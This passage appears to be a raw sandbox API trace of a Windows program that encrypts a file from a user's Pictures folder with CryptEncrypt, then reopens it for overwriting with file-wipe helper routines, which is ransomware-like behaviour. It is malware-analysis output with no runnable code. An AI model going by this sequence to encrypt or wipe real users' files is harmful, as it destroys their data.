pdwDataLen=0x87e820*=0x14cb0) returned 1 [0188.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.661] CharLowerBuffW (in: lpsz="byte[85169]", cchLength=0xb | out: lpsz="byte[85169]") returned 0xb [0188.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.663] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.665] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa88978*, pdwDataLen=0x87e820*=0x14cae, dwBufLen=0x14cb0 | out: pbData=0xa88978*, pdwDataLen=0x87e820*=0x14cb0) returned 1 [0188.666] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.666] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.667] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.669] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.669] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.669] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.669] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.669] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.670] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.670] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.670] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.687] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.687] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.688] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0188.688] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.688] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.688] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0188.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.688] CryptDestroyKey (hKey=0x90af98) returned 1 [0188.689] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.689] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.689] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.689] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.689] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.689] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.689] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.689] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0188.689] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.689] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.689] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.689] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.689] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.689] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.690] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.690] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.690] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.690] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.690] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.690] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.690] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.690] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.690] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.690] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.690] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.691] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.691] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0188.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.691] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.691] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.691] FreeLibrary (hLibModule=0x74f20000) returned 1 [0188.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.693] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.693] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0188.693] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.693] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.693] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb40feb0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xbb86cd70, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0xbb86cd70, ftLastWriteTime.dwHighDateTime=0x1d5de88, nFileSizeHigh=0x0, nFileSizeLow=0x14cae, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ggHHL.png", cAlternateFileName="")) returned 0x90ae18 [0188.694] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.694] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.694] CharLowerBuffW (in: lpsz="byte[85166]", cchLength=0xb | out: lpsz="byte[85166]") returned 0xb [0188.694] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.694] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0188.694] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.694] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0188.694] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0188.695] FreeLibrary (hLibModule=0x75c90000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0188.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.696] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.696] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.696] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.696] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.696] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.696] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.696] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.696] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.696] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.696] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.697] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0188.697] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghhl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0188.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0188.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0188.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbdecc0 | out: hHeap=0x8a0000) returned 1 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.699] RtlAllocateHeap 